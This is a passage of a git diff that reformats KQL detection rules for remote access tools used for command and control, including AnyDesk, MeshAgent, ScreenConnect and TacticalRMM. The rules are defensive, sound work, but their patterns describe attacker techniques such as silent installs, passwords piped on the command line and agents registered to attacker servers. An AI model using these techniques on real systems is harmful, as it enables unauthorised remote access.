Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where (FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql index 2f688535..ac1ebac0 100644 --- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2022-05-20 -// Level: high -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use of AnyDesk from a non-standard folder - -DeviceProcessEvents +// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-20 +// Level: high +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use of AnyDesk from a non-standard folder + +DeviceProcessEvents | where ((FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (not((FolderPath contains "\\AppData\\" or FolderPath contains "Program Files (x86)\\AnyDesk" or FolderPath contains "Program Files\\AnyDesk"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql index 88180709..1e41e786 100644 --- a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql @@ -1,13 +1,13 @@ -// Title: Remote Access Tool - AnyDesk Piped Password Via CLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-28 -// Level: medium -// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate piping of the password to anydesk -// - Some FP could occur with similar tools that uses the same command line '--set-password' - -DeviceProcessEvents +// Title: Remote Access Tool - AnyDesk Piped Password Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-28 +// Level: medium +// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate piping of the password to anydesk +// - Some FP could occur with similar tools that uses the same command line '--set-password' + +DeviceProcessEvents | where ProcessCommandLine contains "/c " and ProcessCommandLine contains "echo " and ProcessCommandLine contains ".exe --set-password" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql index ad374038..527b59fd 100644 --- a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - AnyDesk Silent Installation -// Author: Ján Trenčanský -// Date: 2021-08-06 -// Level: high -// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate deployment of AnyDesk - -DeviceProcessEvents +// Title: Remote Access Tool - AnyDesk Silent Installation +// Author: Ján Trenčanský +// Date: 2021-08-06 +// Level: high +// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate deployment of AnyDesk + +DeviceProcessEvents | where ProcessCommandLine contains "--install" and ProcessCommandLine contains "--start-with-win" and ProcessCommandLine contains "--silent" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql index 63cf323e..08db274e 100644 --- a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - GoToAssist Execution -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Remote Access Tool - GoToAssist Execution +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "GoTo Opener" or ProcessVersionInfoProductName =~ "GoTo Opener" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc." \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql index 3a02dfc9..8cd185d7 100644 --- a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - LogMeIn Execution -// Author: frack113 -// Date: 2022-02-11 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Remote Access Tool - LogMeIn Execution +// Author: frack113 +// Date: 2022-02-11 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "LMIGuardianSvc" or ProcessVersionInfoProductName =~ "LMIGuardianSvc" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc." \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql index 933328ab..bad2e97c 100644 --- a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql +++ b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql @@ -1,13 +1,13 @@ -// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral -// Author: @Kostastsale -// Date: 2024-09-22 -// Level: medium -// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. -// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host. - -DeviceProcessEvents +// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral +// Author: @Kostastsale +// Date: 2024-09-22 +// Level: medium +// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. +// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host. + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\meshagent.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql index f1128c2c..93c2c113 100644 --- a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - NetSupport Execution -// Author: frack113 -// Date: 2022-09-25 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Remote Access Tool - NetSupport Execution +// Author: frack113 +// Date: 2022-09-25 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "NetSupport Client Configurator" or ProcessVersionInfoProductName =~ "NetSupport Remote Control" or ProcessVersionInfoCompanyName =~ "NetSupport Ltd" or ProcessVersionInfoOriginalFileName =~ "PCICFGUI.EXE" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql index 4e947b67..1235b69b 100644 --- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql +++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS -// Author: Norbert Jaśniewicz (AlphaSOC) -// Date: 2025-05-19 -// Level: medium -// Description: Detects potential execution of MeshAgent which is a tool used for remote access. -// Historical data shows that threat actors rename MeshAgent binary to evade detection. -// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Environments that legitimately use MeshAgent - -DeviceProcessEvents +// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: medium +// Description: Detects potential execution of MeshAgent which is a tool used for remote access. +// Historical data shows that threat actors rename MeshAgent binary to evade detection. +// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Environments that legitimately use MeshAgent + +DeviceProcessEvents | where ProcessCommandLine contains "--meshServiceName" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql index 2c038b27..6612de57 100644 --- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql +++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - Potential MeshAgent Execution - Windows -// Author: Norbert Jaśniewicz (AlphaSOC) -// Date: 2025-05-19 -// Level: medium -// Description: Detects potential execution of MeshAgent which is a tool used for remote access. -// Historical data shows that threat actors rename MeshAgent binary to evade detection. -// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Environments that legitimately use MeshAgent - -DeviceProcessEvents +// Title: Remote Access Tool - Potential MeshAgent Execution - Windows +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: medium +// Description: Detects potential execution of MeshAgent which is a tool used for remote access. +// Historical data shows that threat actors rename MeshAgent binary to evade detection. +// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Environments that legitimately use MeshAgent + +DeviceProcessEvents | where ProcessCommandLine contains "--meshServiceName" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql index b2a13fc3..fcbfb0f9 100644 --- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql +++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS -// Author: Norbert Jaśniewicz (AlphaSOC) -// Date: 2025-05-19 -// Level: high -// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. -// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. -// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 - -DeviceProcessEvents +// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: high +// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. +// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not((FolderPath endswith "/meshagent" or FolderPath endswith "/meshagent_osx64"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql index 0adbbe6e..390b946e 100644 --- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql +++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows -// Author: Norbert Jaśniewicz (AlphaSOC) -// Date: 2025-05-19 -// Level: high -// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. -// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. -// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 - -DeviceProcessEvents +// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows +// Author: Norbert Jaśniewicz (AlphaSOC) +// Date: 2025-05-19 +// Level: high +// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. +// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not(FolderPath endswith "\\meshagent.exe")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql index 4b65c2ec..c61219c6 100644 --- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - ScreenConnect Execution -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate usage of the tool - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Execution +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate usage of the tool + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "ScreenConnect Service" or ProcessVersionInfoProductName =~ "ScreenConnect" or ProcessVersionInfoCompanyName =~ "ScreenConnect Software" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql index 78ef6bc3..8ba05d1c 100644 --- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale -// Date: 2022-02-25 -// Level: medium -// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed. - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale +// Date: 2022-02-25 +// Level: medium +// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed. + +DeviceProcessEvents | where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wevtutil.exe") and (InitiatingProcessCommandLine contains ":\\Windows\\TEMP\\ScreenConnect\\" and InitiatingProcessCommandLine contains "run.cmd") \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql index 27d66443..296cee81 100644 --- a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - Simple Help Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-23 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate usage of the tool - -DeviceProcessEvents +// Title: Remote Access Tool - Simple Help Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate usage of the tool + +DeviceProcessEvents | where (FolderPath contains "\\JWrapper-Remote Access\\" or FolderPath contains "\\JWrapper-Remote Support\\") and FolderPath endswith "\\SimpleService.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql index 27505599..06bc159c 100644 --- a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql +++ b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server -// Author: Ahmed Nosir (@egycondor) -// Date: 2025-05-29 -// Level: medium -// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. -// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. -// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219, attack.t1105 -// False Positives: -// - Legitimate system administrator deploying TacticalRMM - -DeviceProcessEvents +// Title: Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server +// Author: Ahmed Nosir (@egycondor) +// Date: 2025-05-29 +// Level: medium +// Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. +// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. +// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219, attack.t1105 +// False Positives: +// - Legitimate system administrator deploying TacticalRMM + +DeviceProcessEvents | where (ProcessCommandLine contains "--api" and ProcessCommandLine contains "--auth" and ProcessCommandLine contains "--client-id" and ProcessCommandLine contains "--site-id" and ProcessCommandLine contains "--agent-type") and FolderPath contains "\\TacticalAgent\\tacticalrmm.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql index bf284ccc..cc5c040e 100644 --- a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - UltraViewer Execution -// Author: frack113 -// Date: 2022-09-25 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Remote Access Tool - UltraViewer Execution +// Author: frack113 +// Date: 2022-09-25 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoProductName =~ "UltraViewer" or ProcessVersionInfoCompanyName =~ "DucFabulous Co,ltd" or ProcessVersionInfoOriginalFileName =~ "UltraViewer_Desktop.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql index e0c3c2b3..3a5ebb05 100644 --- a/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql +++ b/KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql @@ -1,10 +1,10 @@ -// Title: Remote File Download Via Desktopimgdownldr Utility -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-27 -// Level: medium -// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Remote File Download Via Desktopimgdownldr Utility +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: medium +// Description: Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where ProcessCommandLine contains "/lockscreenurl:http" and FolderPath endswith "\\desktopimgdownldr.exe" and InitiatingProcessFolderPath endswith "\\desktopimgdownldr.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql index a348e3fb..b5eaa2ca 100644 --- a/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql +++ b/KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed Cloudflared.EXE Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-12-20 -// Level: high -// Description: Detects the execution of a renamed "cloudflared" binary. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090.001 - -DeviceProcessEvents +// Title: Renamed Cloudflared.EXE 